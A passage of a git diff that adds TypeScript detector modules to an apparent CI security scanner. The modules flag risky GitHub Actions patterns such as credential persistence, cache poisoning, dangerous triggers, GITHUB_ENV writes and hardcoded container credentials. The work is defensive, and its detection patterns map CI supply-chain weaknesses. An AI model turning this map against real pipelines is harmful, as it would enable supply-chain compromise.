update["package-ecosystem"] + : "unknown-ecosystem"; + const evidence = buildFindingEvidence({ + textContent: input.textContent, + searchTerms: [ecosystem, "insecure-external-code-execution", "allow"], + fallbackValue: `${ecosystem} enables insecure external code execution`, + }); + + findings.push({ + rule_id: "dependabot-execution", + finding_id: `DEPENDABOT_EXECUTION-${input.filePath}-${index}`, + severity: "HIGH", + category: "CI_SUPPLY_CHAIN", + layer: "L2", + file_path: input.filePath, + location: { field: `updates[${index}].insecure-external-code-execution` }, + description: "Dependabot update rule allows insecure external code execution", + affected_tools: ["dependabot"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-94", + confidence: "HIGH", + fixable: false, + remediation_actions: [ + "Remove insecure-external-code-execution allowances and isolate registries through trusted credentials", + ], + evidence: evidence?.evidence ?? null, + suppressed: false, + }); + }); + + return findings; +} diff --git a/src/layer2-static/detectors/workflow-anonymous-definition.ts b/src/layer2-static/detectors/workflow-anonymous-definition.ts new file mode 100644 index 0000000..8899775 --- /dev/null +++ b/src/layer2-static/detectors/workflow-anonymous-definition.ts @@ -0,0 +1,64 @@ +import { buildFindingEvidence } from "../evidence.js"; +import type { Finding } from "../../types/finding.js"; +import { extractWorkflowFacts, isGitHubWorkflowPath } from "../workflow/parser.js"; + +export interface WorkflowAnonymousDefinitionInput { + filePath: string; + parsed: unknown; + textContent: string; +} + +function asRecord(value: unknown): Record | null { + if (!value || typeof value !== "object" || Array.isArray(value)) { + return null; + } + return value as Record; +} + +export function detectWorkflowAnonymousDefinition( + input: WorkflowAnonymousDefinitionInput, +): Finding[] { + if (!isGitHubWorkflowPath(input.filePath)) { + return []; + } + + const facts = 
extractWorkflowFacts(input.parsed); + if (!facts) { + return []; + } + + const root = asRecord(input.parsed); + const name = typeof root?.name === "string" ? root.name.trim() : ""; + if (name.length > 0) { + return []; + } + + const evidence = buildFindingEvidence({ + textContent: input.textContent, + searchTerms: ["name:"], + fallbackValue: "workflow has no top-level name", + }); + + return [ + { + rule_id: "workflow-anonymous-definition", + finding_id: `WORKFLOW_ANONYMOUS_DEFINITION-${input.filePath}`, + severity: "LOW", + category: "CI_SUPPLY_CHAIN", + layer: "L2", + file_path: input.filePath, + location: { field: "name" }, + description: + "Workflow omits a top-level name, reducing review clarity and incident traceability", + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-200", + confidence: "HIGH", + fixable: false, + remediation_actions: ["Add an explicit top-level workflow name"], + evidence: evidence?.evidence ?? null, + suppressed: false, + }, + ]; +} diff --git a/src/layer2-static/detectors/workflow-archived-uses.ts b/src/layer2-static/detectors/workflow-archived-uses.ts new file mode 100644 index 0000000..3d75f4d --- /dev/null +++ b/src/layer2-static/detectors/workflow-archived-uses.ts @@ -0,0 +1,193 @@ +import { buildFindingEvidence } from "../evidence.js"; +import type { Finding } from "../../types/finding.js"; +import { extractWorkflowFacts, isGitHubWorkflowPath } from "../workflow/parser.js"; + +export interface WorkflowArchivedUsesInput { + filePath: string; + parsed: unknown; + textContent: string; +} + +interface RepositoryUseTarget { + raw: string; + owner: string; + repo: string; +} + +type FetchFn = typeof fetch; + +const archivedRepoCacheByFetch = new WeakMap>(); +const GITHUB_API_HEADERS = { + Accept: "application/vnd.github+json", + "User-Agent": "CodeGate", +} as const; + +function asRecord(value: unknown): Record | null { + if (!value || typeof value !== "object" || Array.isArray(value)) { + return null; + 
} + return value as Record; +} + +function isExternalRepositoryUse(value: string): boolean { + return value.startsWith("./") || value.startsWith("../") || value.startsWith("docker://"); +} + +function trimTrailingSlashes(value: string): string { + return value.replace(/\/+$/u, ""); +} + +function parseRepositoryUses(value: string): RepositoryUseTarget | null { + const trimmed = value.trim(); + if (trimmed.length === 0 || isExternalRepositoryUse(trimmed)) { + return null; + } + + const atIndex = trimmed.lastIndexOf("@"); + if (atIndex < 0) { + return null; + } + + const slug = trimTrailingSlashes(trimmed.slice(0, atIndex).trim()); + const [owner, repo] = slug.split("/"); + if (!owner || !repo) { + return null; + } + + return { + raw: trimmed, + owner: owner.toLowerCase(), + repo: repo.toLowerCase(), + }; +} + +async function isArchivedRepository(owner: string, repo: string): Promise { + const fetchFn = globalThis.fetch; + if (typeof fetchFn !== "function") { + return false; + } + + let cache = archivedRepoCacheByFetch.get(fetchFn); + if (!cache) { + cache = new Map(); + archivedRepoCacheByFetch.set(fetchFn, cache); + } + + const cacheKey = `${owner}/${repo}`; + const cached = cache.get(cacheKey); + if (cached !== undefined) { + return cached; + } + + try { + const response = await fetchFn( + `https://api.github.com/repos/${encodeURIComponent(owner)}/${encodeURIComponent(repo)}`, + { + headers: GITHUB_API_HEADERS, + }, + ); + + if (!response.ok) { + cache.set(cacheKey, false); + return false; + } + + const payload = (await response.json()) as { archived?: unknown } | null; + const archived = Boolean(payload && typeof payload === "object" && payload.archived === true); + cache.set(cacheKey, archived); + return archived; + } catch { + return false; + } +} + +function gatherUsesTargets(parsed: unknown): Array { + const root = asRecord(parsed); + const jobsRecord = asRecord(root?.jobs); + if (!jobsRecord) { + return []; + } + + const targets: Array = []; + const 
addTarget = (uses: string, field: string): void => { + const parsedUses = parseRepositoryUses(uses); + if (parsedUses) { + targets.push({ + ...parsedUses, + field, + }); + } + }; + + for (const [jobId, jobValue] of Object.entries(jobsRecord)) { + const jobRecord = asRecord(jobValue); + if (!jobRecord) { + continue; + } + + if (typeof jobRecord.uses === "string") { + addTarget(jobRecord.uses, `jobs.${jobId}.uses`); + } + + const steps = Array.isArray(jobRecord.steps) ? jobRecord.steps : []; + steps.forEach((step, stepIndex) => { + const stepRecord = asRecord(step); + if (stepRecord && typeof stepRecord.uses === "string") { + addTarget(stepRecord.uses, `jobs.${jobId}.steps[${stepIndex}].uses`); + } + }); + } + + return targets; +} + +export async function detectWorkflowArchivedUses( + input: WorkflowArchivedUsesInput, +): Promise { + if (!isGitHubWorkflowPath(input.filePath)) { + return []; + } + + if (!extractWorkflowFacts(input.parsed)) { + return []; + } + + const targets = gatherUsesTargets(input.parsed); + const findings: Finding[] = []; + + for (const target of targets) { + if (!(await isArchivedRepository(target.owner, target.repo))) { + continue; + } + + const evidence = buildFindingEvidence({ + textContent: input.textContent, + searchTerms: [target.raw, `${target.owner}/${target.repo}`], + fallbackValue: target.raw, + }); + + findings.push({ + rule_id: "workflow-archived-uses", + finding_id: `WORKFLOW_ARCHIVED_USES-${input.filePath}-${target.field}`, + severity: "MEDIUM", + category: "CI_VULNERABLE_ACTION", + layer: "L2", + file_path: input.filePath, + location: { field: target.field }, + description: "Workflow action or reusable workflow comes from an archived repository", + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-829", + confidence: "HIGH", + fixable: false, + remediation_actions: [ + "Replace the archived repository reference with an actively maintained alternative", + ], + evidence: evidence?.evidence ?? 
null, + suppressed: false, + }); + } + + return findings; +} diff --git a/src/layer2-static/detectors/workflow-artipacked.ts b/src/layer2-static/detectors/workflow-artipacked.ts new file mode 100644 index 0000000..6739115 --- /dev/null +++ b/src/layer2-static/detectors/workflow-artipacked.ts @@ -0,0 +1,81 @@ +import { buildFindingEvidence } from "../evidence.js"; +import type { Finding } from "../../types/finding.js"; +import { extractWorkflowFacts, isGitHubWorkflowPath } from "../workflow/parser.js"; + +export interface WorkflowArtipackedInput { + filePath: string; + parsed: unknown; + textContent: string; +} + +function isCheckoutStep(uses: string | undefined): boolean { + return typeof uses === "string" && /^actions\/checkout(?:@.+)?$/iu.test(uses.trim()); +} + +function persistsCredentials(value: unknown): boolean { + if (typeof value !== "string") { + return true; + } + + return value.trim().toLowerCase() !== "false"; +} + +export function detectWorkflowArtipacked(input: WorkflowArtipackedInput): Finding[] { + if (!isGitHubWorkflowPath(input.filePath)) { + return []; + } + + const facts = extractWorkflowFacts(input.parsed); + if (!facts) { + return []; + } + + const findings: Finding[] = []; + + facts.jobs.forEach((job, jobIndex) => { + job.steps.forEach((step, stepIndex) => { + if (!isCheckoutStep(step.uses)) { + return; + } + + if (!persistsCredentials(step.with?.["persist-credentials"])) { + return; + } + + const searchTerms = ["persist-credentials: true"]; + if (step.uses) { + searchTerms.push(step.uses); + } + + const evidence = buildFindingEvidence({ + textContent: input.textContent, + searchTerms, + fallbackValue: "actions/checkout persists credentials on disk", + }); + + findings.push({ + rule_id: "workflow-artipacked", + finding_id: `WORKFLOW_ARTIPACKED-${input.filePath}-${jobIndex}-${stepIndex}`, + severity: "HIGH", + category: "CI_SUPPLY_CHAIN", + layer: "L2", + file_path: input.filePath, + location: { field: 
`jobs.${job.id}.steps[${stepIndex}].with.persist-credentials` }, + description: "Checkout step persists credentials on disk", + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-922", + confidence: "HIGH", + fixable: false, + remediation_actions: [ + "Set actions/checkout persist-credentials to false unless the workflow explicitly needs Git credentials", + ], + evidence: evidence?.evidence ?? null, + suppressed: false, + }); + }); + }); + + return findings; +} diff --git a/src/layer2-static/detectors/workflow-bot-conditions.ts b/src/layer2-static/detectors/workflow-bot-conditions.ts new file mode 100644 index 0000000..ba6b8ee --- /dev/null +++ b/src/layer2-static/detectors/workflow-bot-conditions.ts @@ -0,0 +1,141 @@ +import { buildFindingEvidence } from "../evidence.js"; +import type { Finding } from "../../types/finding.js"; +import { extractWorkflowFacts, isGitHubWorkflowPath } from "../workflow/parser.js"; + +export interface WorkflowBotConditionsInput { + filePath: string; + parsed: unknown; + textContent: string; +} + +interface ConditionalStep { + jobId: string; + stepIndex?: number; + condition: string; + locationField: string; + run?: string; + uses?: string; +} + +const BOT_CONDITION_PATTERN = + /github\.actor\s*(?:==|!=)\s*['"](?:dependabot\[bot\]|renovate\[bot\]|github-actions\[bot\])['"]/iu; +const PRIVILEGED_RUN_TOKENS = ["publish", "deploy", "release", "npm publish", "gh release"]; + +function asRecord(value: unknown): Record | null { + if (!value || typeof value !== "object" || Array.isArray(value)) { + return null; + } + return value as Record; +} + +function gatherConditionalSteps(parsed: unknown): ConditionalStep[] { + const root = asRecord(parsed); + const jobs = asRecord(root?.jobs); + if (!jobs) { + return []; + } + + const steps: ConditionalStep[] = []; + for (const [jobId, jobValue] of Object.entries(jobs)) { + const job = asRecord(jobValue); + const stepEntries = Array.isArray(job?.steps) ? 
job.steps : []; + const jobCondition = typeof job?.if === "string" ? job.if : undefined; + + if (jobCondition) { + const hasPrivilegedStep = stepEntries.some((stepValue) => { + const step = asRecord(stepValue); + const run = typeof step?.run === "string" ? step.run : undefined; + const uses = typeof step?.uses === "string" ? step.uses : undefined; + return isPrivilegedStep(run, uses); + }); + + if (hasPrivilegedStep) { + steps.push({ + jobId, + condition: jobCondition, + locationField: `jobs.${jobId}.if`, + run: stepEntries + .map((stepValue) => asRecord(stepValue)) + .find((step) => step && typeof step.run === "string")?.run as string | undefined, + uses: stepEntries + .map((stepValue) => asRecord(stepValue)) + .find((step) => step && typeof step.uses === "string")?.uses as string | undefined, + }); + } + } + + stepEntries.forEach((stepValue, stepIndex) => { + const step = asRecord(stepValue); + if (!step || typeof step.if !== "string") { + return; + } + + steps.push({ + jobId, + stepIndex, + condition: step.if, + locationField: `jobs.${jobId}.steps[${stepIndex}].if`, + run: typeof step.run === "string" ? step.run : undefined, + uses: typeof step.uses === "string" ? step.uses : undefined, + }); + }); + } + + return steps; +} + +function isPrivilegedStep(run: string | undefined, uses: string | undefined): boolean { + const runValue = run?.toLowerCase() ?? 
""; + if (PRIVILEGED_RUN_TOKENS.some((token) => runValue.includes(token))) { + return true; + } + return typeof uses === "string" && uses.trim().length > 0; +} + +export function detectWorkflowBotConditions(input: WorkflowBotConditionsInput): Finding[] { + if (!isGitHubWorkflowPath(input.filePath)) { + return []; + } + + const facts = extractWorkflowFacts(input.parsed); + if (!facts) { + return []; + } + + const findings: Finding[] = []; + for (const step of gatherConditionalSteps(input.parsed)) { + if (!BOT_CONDITION_PATTERN.test(step.condition) || !isPrivilegedStep(step.run, step.uses)) { + continue; + } + + const evidence = buildFindingEvidence({ + textContent: input.textContent, + searchTerms: [step.condition, step.run ?? "", step.uses ?? ""], + fallbackValue: step.condition, + }); + + findings.push({ + rule_id: "bot-conditions", + finding_id: `BOT_CONDITIONS-${input.filePath}-${step.locationField}`, + severity: "MEDIUM", + category: "CI_TRIGGER", + layer: "L2", + file_path: input.filePath, + location: { field: step.locationField }, + description: "Privileged workflow step is guarded primarily by bot-actor identity checks", + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-287", + confidence: "HIGH", + fixable: false, + remediation_actions: [ + "Use explicit trust-boundary checks (event type, branch protection, ref, permissions) beyond actor-name conditions", + ], + evidence: evidence?.evidence ?? 
null, + suppressed: false, + }); + } + + return findings; +} diff --git a/src/layer2-static/detectors/workflow-cache-poisoning.ts b/src/layer2-static/detectors/workflow-cache-poisoning.ts new file mode 100644 index 0000000..c95a2cb --- /dev/null +++ b/src/layer2-static/detectors/workflow-cache-poisoning.ts @@ -0,0 +1,87 @@ +import { buildFindingEvidence } from "../evidence.js"; +import type { Finding } from "../../types/finding.js"; +import { extractWorkflowFacts, isGitHubWorkflowPath } from "../workflow/parser.js"; + +export interface WorkflowCachePoisoningInput { + filePath: string; + parsed: unknown; + textContent: string; +} + +const UNTRUSTED_TRIGGERS = new Set(["pull_request", "pull_request_target", "workflow_run"]); + +function normalizeUsesSlug(value: string): string { + const beforeRef = value.split("@")[0] ?? value; + return beforeRef.replace(/\/+$/u, "").toLowerCase(); +} + +function isCacheAction(uses: string): boolean { + return normalizeUsesSlug(uses).startsWith("actions/cache"); +} + +function hasRestoreKeys(stepWith: Record | undefined): string | null { + const restoreKeys = stepWith?.["restore-keys"]?.trim(); + return restoreKeys && restoreKeys.length > 0 ? 
restoreKeys : null; +} + +export function detectWorkflowCachePoisoning(input: WorkflowCachePoisoningInput): Finding[] { + if (!isGitHubWorkflowPath(input.filePath)) { + return []; + } + + const facts = extractWorkflowFacts(input.parsed); + if (!facts) { + return []; + } + + const hasUntrustedTrigger = facts.triggers.some((trigger) => UNTRUSTED_TRIGGERS.has(trigger)); + if (!hasUntrustedTrigger) { + return []; + } + + const findings: Finding[] = []; + + facts.jobs.forEach((job, jobIndex) => { + job.steps.forEach((step, stepIndex) => { + const uses = step.uses?.trim(); + if (!uses || !isCacheAction(uses)) { + return; + } + + const restoreKeys = hasRestoreKeys(step.with); + if (!restoreKeys) { + return; + } + + const evidence = buildFindingEvidence({ + textContent: input.textContent, + searchTerms: ["restore-keys:", restoreKeys], + fallbackValue: restoreKeys, + }); + + findings.push({ + rule_id: "workflow-cache-poisoning", + finding_id: `WORKFLOW_CACHE_POISONING-${input.filePath}-${jobIndex}-${stepIndex}`, + severity: "HIGH", + category: "CI_SUPPLY_CHAIN", + layer: "L2", + file_path: input.filePath, + location: { field: `jobs.${job.id}.steps[${stepIndex}].with.restore-keys` }, + description: "Cache restore keys can enable cache poisoning on untrusted workflow triggers", + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-345", + confidence: "MEDIUM", + fixable: false, + remediation_actions: [ + "Remove broad restore keys or restrict cache reuse to trusted branches and jobs", + ], + evidence: evidence?.evidence ?? 
null, + suppressed: false, + }); + }); + }); + + return findings; +} diff --git a/src/layer2-static/detectors/workflow-concurrency-limits.ts b/src/layer2-static/detectors/workflow-concurrency-limits.ts new file mode 100644 index 0000000..5ca45fb --- /dev/null +++ b/src/layer2-static/detectors/workflow-concurrency-limits.ts @@ -0,0 +1,96 @@ +import { buildFindingEvidence } from "../evidence.js"; +import type { Finding } from "../../types/finding.js"; +import { extractWorkflowFacts, isGitHubWorkflowPath } from "../workflow/parser.js"; + +export interface WorkflowConcurrencyLimitsInput { + filePath: string; + parsed: unknown; + textContent: string; +} + +function asRecord(value: unknown): Record | null { + if (!value || typeof value !== "object" || Array.isArray(value)) { + return null; + } + return value as Record; +} + +function hasRiskyTrigger(triggers: string[]): boolean { + return triggers.some( + (trigger) => + trigger === "pull_request_target" || + trigger === "workflow_run" || + trigger === "issue_comment", + ); +} + +function hasWorkflowConcurrency(parsed: unknown): boolean { + const root = asRecord(parsed); + const concurrency = root?.concurrency; + if (typeof concurrency === "string") { + return concurrency.trim().length > 0; + } + return asRecord(concurrency) !== null; +} + +function hasAnyJobConcurrency(parsed: unknown): boolean { + const root = asRecord(parsed); + const jobs = asRecord(root?.jobs); + if (!jobs) { + return false; + } + return Object.values(jobs).some((jobValue) => { + const job = asRecord(jobValue); + const concurrency = job?.concurrency; + if (typeof concurrency === "string") { + return concurrency.trim().length > 0; + } + return asRecord(concurrency) !== null; + }); +} + +export function detectWorkflowConcurrencyLimits(input: WorkflowConcurrencyLimitsInput): Finding[] { + if (!isGitHubWorkflowPath(input.filePath)) { + return []; + } + + const facts = extractWorkflowFacts(input.parsed); + if (!facts || !hasRiskyTrigger(facts.triggers)) { 
+ return []; + } + + if (hasWorkflowConcurrency(input.parsed) || hasAnyJobConcurrency(input.parsed)) { + return []; + } + + const evidence = buildFindingEvidence({ + textContent: input.textContent, + searchTerms: ["pull_request_target", "workflow_run", "issue_comment", "concurrency"], + fallbackValue: "risky trigger without concurrency limits", + }); + + return [ + { + rule_id: "workflow-concurrency-limits", + finding_id: `WORKFLOW_CONCURRENCY_LIMITS-${input.filePath}`, + severity: "MEDIUM", + category: "CI_TRIGGER", + layer: "L2", + file_path: input.filePath, + location: { field: "concurrency" }, + description: + "Workflow uses risky triggers without concurrency controls, increasing race and replay risk", + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-362", + confidence: "MEDIUM", + fixable: false, + remediation_actions: [ + "Define workflow- or job-level concurrency groups with cancel-in-progress controls", + ], + evidence: evidence?.evidence ?? null, + suppressed: false, + }, + ]; +} diff --git a/src/layer2-static/detectors/workflow-dangerous-triggers.ts b/src/layer2-static/detectors/workflow-dangerous-triggers.ts new file mode 100644 index 0000000..01c536f --- /dev/null +++ b/src/layer2-static/detectors/workflow-dangerous-triggers.ts @@ -0,0 +1,49 @@ +import type { Finding } from "../../types/finding.js"; +import { extractWorkflowFacts, isGitHubWorkflowPath } from "../workflow/parser.js"; + +const DANGEROUS_TRIGGERS = new Set(["pull_request_target", "workflow_run"]); + +export interface WorkflowDangerousTriggersInput { + filePath: string; + parsed: unknown; +} + +export function detectWorkflowDangerousTriggers(input: WorkflowDangerousTriggersInput): Finding[] { + if (!isGitHubWorkflowPath(input.filePath)) { + return []; + } + + const facts = extractWorkflowFacts(input.parsed); + if (!facts) { + return []; + } + + const triggers = facts.triggers.filter((trigger) => DANGEROUS_TRIGGERS.has(trigger)); + if (triggers.length === 0) 
{ + return []; + } + + return [ + { + rule_id: "workflow-dangerous-triggers", + finding_id: `WORKFLOW_DANGEROUS_TRIGGERS-${input.filePath}`, + severity: "HIGH", + category: "CI_TRIGGER", + layer: "L2", + file_path: input.filePath, + location: { field: "on" }, + description: `Workflow uses high-risk trigger(s): ${triggers.join(", ")}`, + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-693", + confidence: "MEDIUM", + fixable: false, + remediation_actions: [ + "Restrict trigger conditions and avoid running untrusted pull request data in privileged contexts", + ], + evidence: triggers.join(", "), + suppressed: false, + }, + ]; +} diff --git a/src/layer2-static/detectors/workflow-excessive-permissions.ts b/src/layer2-static/detectors/workflow-excessive-permissions.ts new file mode 100644 index 0000000..759df49 --- /dev/null +++ b/src/layer2-static/detectors/workflow-excessive-permissions.ts @@ -0,0 +1,83 @@ +import type { Finding } from "../../types/finding.js"; +import { extractWorkflowFacts, isGitHubWorkflowPath } from "../workflow/parser.js"; + +export interface WorkflowExcessivePermissionsInput { + filePath: string; + parsed: unknown; +} + +function hasWritePermission(value: unknown): boolean { + if (typeof value === "string") { + return value === "write-all"; + } + if (!value || typeof value !== "object" || Array.isArray(value)) { + return false; + } + return Object.values(value as Record).some( + (permission) => permission === "write", + ); +} + +export function detectWorkflowExcessivePermissions( + input: WorkflowExcessivePermissionsInput, +): Finding[] { + if (!isGitHubWorkflowPath(input.filePath)) { + return []; + } + + const facts = extractWorkflowFacts(input.parsed); + if (!facts) { + return []; + } + + const findings: Finding[] = []; + + if (hasWritePermission(facts.workflowPermissions)) { + findings.push({ + rule_id: "workflow-excessive-permissions", + finding_id: `WORKFLOW_EXCESSIVE_PERMISSIONS-WORKFLOW-${input.filePath}`, 
+ severity: "HIGH", + category: "CI_PERMISSIONS", + layer: "L2", + file_path: input.filePath, + location: { field: "permissions" }, + description: "Workflow defines overly broad write permissions", + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-732", + confidence: "HIGH", + fixable: false, + remediation_actions: ["Scope GITHUB_TOKEN permissions to least privilege"], + evidence: typeof facts.workflowPermissions === "string" ? facts.workflowPermissions : null, + suppressed: false, + }); + } + + facts.jobs.forEach((job, index) => { + if (!hasWritePermission(job.permissions)) { + return; + } + + findings.push({ + rule_id: "workflow-excessive-permissions", + finding_id: `WORKFLOW_EXCESSIVE_PERMISSIONS-JOB-${input.filePath}-${index}`, + severity: "HIGH", + category: "CI_PERMISSIONS", + layer: "L2", + file_path: input.filePath, + location: { field: `jobs.${job.id}.permissions` }, + description: "Job defines overly broad write permissions", + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-732", + confidence: "HIGH", + fixable: false, + remediation_actions: ["Reduce job-level permissions to required read scopes"], + suppressed: false, + }); + }); + + return findings; +} diff --git a/src/layer2-static/detectors/workflow-forbidden-uses.ts b/src/layer2-static/detectors/workflow-forbidden-uses.ts new file mode 100644 index 0000000..ce027f2 --- /dev/null +++ b/src/layer2-static/detectors/workflow-forbidden-uses.ts @@ -0,0 +1,199 @@ +import { buildFindingEvidence } from "../evidence.js"; +import type { Finding } from "../../types/finding.js"; +import { extractWorkflowFacts, isGitHubWorkflowPath } from "../workflow/parser.js"; + +export interface WorkflowForbiddenUsesRuleConfig { + allow?: string[]; + deny?: string[]; +} + +export interface WorkflowForbiddenUsesInput { + filePath: string; + parsed: unknown; + textContent: string; + config?: WorkflowForbiddenUsesRuleConfig; +} + +interface CompiledForbiddenPolicy 
{ + mode: "allow" | "deny"; + allow: RegExp[]; + deny: RegExp[]; +} + +function normalizePattern(value: string): string { + return value.replaceAll("\\", "/").trim().toLowerCase(); +} + +function globToRegExp(glob: string): RegExp { + const pattern = normalizePattern(glob); + if (pattern.length === 0) { + return /^$/; + } + + let regex = "^"; + for (let index = 0; index < pattern.length; index += 1) { + const char = pattern[index]; + + if (char === "*") { + if (pattern[index + 1] === "*") { + regex += ".*"; + index += 1; + } else { + regex += "[^/]*"; + } + continue; + } + + if (char === "?") { + regex += "[^/]"; + continue; + } + + regex += char.replace(/[.*+?^${}()|[\]\\]/gu, "\\$&"); + } + + regex += "$"; + return new RegExp(regex); +} + +function compilePatterns(patterns: readonly string[]): RegExp[] { + return patterns.map((pattern) => globToRegExp(pattern)); +} + +function matchesRepositoryPattern(value: string, pattern: RegExp): boolean { + return pattern.test(value.toLowerCase()); +} + +function parseRepositoryUses(value: string): { slug: string; ref: string } | null { + const trimmed = value.trim(); + if (trimmed.startsWith("./") || trimmed.startsWith("docker://")) { + return null; + } + + const atIndex = trimmed.lastIndexOf("@"); + if (atIndex < 0) { + return null; + } + + const slug = trimmed.slice(0, atIndex).trim().replace(/\/+$/u, "").toLowerCase(); + const ref = trimmed + .slice(atIndex + 1) + .trim() + .toLowerCase(); + if (slug.length === 0 || !slug.includes("/") || ref.length === 0) { + return null; + } + + return { slug, ref }; +} + +function getForbiddenPolicy( + config: WorkflowForbiddenUsesRuleConfig | undefined, +): CompiledForbiddenPolicy | null { + const allow = config?.allow?.filter((pattern) => pattern.trim().length > 0) ?? []; + const deny = config?.deny?.filter((pattern) => pattern.trim().length > 0) ?? 
[]; + const allowPatterns = compilePatterns(allow); + const denyPatterns = compilePatterns(deny); + + if (allow.length > 0) { + return { + mode: "allow", + allow: allowPatterns, + deny: denyPatterns, + }; + } + if (deny.length > 0) { + return { + mode: "deny", + allow: [], + deny: denyPatterns, + }; + } + return null; +} + +function isForbidden(uses: string, policy: CompiledForbiddenPolicy): boolean { + const parsed = parseRepositoryUses(uses); + if (!parsed) { + return false; + } + + if (policy.deny.some((pattern) => matchesRepositoryPattern(parsed.slug, pattern))) { + return true; + } + + if ( + policy.mode === "allow" && + !policy.allow.some((pattern) => matchesRepositoryPattern(parsed.slug, pattern)) + ) { + return true; + } + + return false; +} + +export function detectWorkflowForbiddenUses(input: WorkflowForbiddenUsesInput): Finding[] { + if (!isGitHubWorkflowPath(input.filePath)) { + return []; + } + + const facts = extractWorkflowFacts(input.parsed); + if (!facts) { + return []; + } + + const policy = getForbiddenPolicy(input.config); + if (!policy) { + return []; + } + + const findings: Finding[] = []; + + facts.jobs.forEach((job, jobIndex) => { + job.steps.forEach((step, stepIndex) => { + const uses = step.uses?.trim(); + if (!uses) { + return; + } + + if (!isForbidden(uses, policy)) { + return; + } + + const evidence = buildFindingEvidence({ + textContent: input.textContent, + searchTerms: [uses], + fallbackValue: `uses: ${uses}`, + }); + + findings.push({ + rule_id: "workflow-forbidden-uses", + finding_id: `WORKFLOW_FORBIDDEN_USES-${input.filePath}-${jobIndex}-${stepIndex}`, + severity: "HIGH", + category: "CI_SUPPLY_CHAIN", + layer: "L2", + file_path: input.filePath, + location: { field: `jobs.${job.id}.steps[${stepIndex}].uses` }, + description: + policy.mode === "allow" + ? 
"Workflow uses repository action outside the configured allowlist" + : "Workflow uses repository action matching the configured denylist", + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-829", + confidence: "HIGH", + fixable: false, + remediation_actions: [ + policy.mode === "allow" + ? "Add the action to the allowlist only if it is explicitly trusted" + : "Remove the action or move it to an allowlist-only policy if it is trusted", + ], + evidence: evidence?.evidence ?? null, + suppressed: false, + }); + }); + }); + + return findings; +} diff --git a/src/layer2-static/detectors/workflow-github-env.ts b/src/layer2-static/detectors/workflow-github-env.ts new file mode 100644 index 0000000..c7ec36b --- /dev/null +++ b/src/layer2-static/detectors/workflow-github-env.ts @@ -0,0 +1,64 @@ +import { buildFindingEvidence } from "../evidence.js"; +import type { Finding } from "../../types/finding.js"; +import { extractWorkflowFacts, isGitHubWorkflowPath } from "../workflow/parser.js"; + +export interface WorkflowGithubEnvInput { + filePath: string; + parsed: unknown; + textContent: string; +} + +function writesToGithubEnv(run: string | undefined): boolean { + return typeof run === "string" && />>\s*["']?\$?\{?GITHUB_ENV\}?/iu.test(run); +} + +export function detectWorkflowGithubEnv(input: WorkflowGithubEnvInput): Finding[] { + if (!isGitHubWorkflowPath(input.filePath)) { + return []; + } + + const facts = extractWorkflowFacts(input.parsed); + if (!facts) { + return []; + } + + const findings: Finding[] = []; + + facts.jobs.forEach((job, jobIndex) => { + job.steps.forEach((step, stepIndex) => { + if (!writesToGithubEnv(step.run)) { + return; + } + + const evidence = buildFindingEvidence({ + textContent: input.textContent, + searchTerms: [step.run ?? "", "GITHUB_ENV"], + fallbackValue: step.run ?? 
"write to GITHUB_ENV", + }); + + findings.push({ + rule_id: "workflow-github-env", + finding_id: `WORKFLOW_GITHUB_ENV-${input.filePath}-${jobIndex}-${stepIndex}`, + severity: "HIGH", + category: "CI_SUPPLY_CHAIN", + layer: "L2", + file_path: input.filePath, + location: { field: `jobs.${job.id}.steps[${stepIndex}].run` }, + description: "Run step writes to GITHUB_ENV", + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-94", + confidence: "HIGH", + fixable: false, + remediation_actions: [ + "Avoid writing attacker-controlled values to GITHUB_ENV and prefer validated environment variables", + ], + evidence: evidence?.evidence ?? null, + suppressed: false, + }); + }); + }); + + return findings; +} diff --git a/src/layer2-static/detectors/workflow-hardcoded-container-credentials.ts b/src/layer2-static/detectors/workflow-hardcoded-container-credentials.ts new file mode 100644 index 0000000..4501b0d --- /dev/null +++ b/src/layer2-static/detectors/workflow-hardcoded-container-credentials.ts @@ -0,0 +1,119 @@ +import { buildFindingEvidence } from "../evidence.js"; +import type { Finding } from "../../types/finding.js"; +import { extractWorkflowFacts, isGitHubWorkflowPath } from "../workflow/parser.js"; + +export interface WorkflowHardcodedContainerCredentialsInput { + filePath: string; + parsed: unknown; + textContent: string; +} + +interface ImageTarget { + field: string; + image: string; +} + +const CREDENTIAL_IN_IMAGE_PATTERNS = [/:\/\/[^/\s:@]+:[^@\s]+@/iu, /:[^@\s]+@(?!sha256:)/iu]; + +function asRecord(value: unknown): Record | null { + if (!value || typeof value !== "object" || Array.isArray(value)) { + return null; + } + return value as Record; +} + +function gatherImageTargets(parsed: unknown): ImageTarget[] { + const root = asRecord(parsed); + const jobs = asRecord(root?.jobs); + if (!jobs) { + return []; + } + + const targets: ImageTarget[] = []; + for (const [jobId, jobValue] of Object.entries(jobs)) { + const job = 
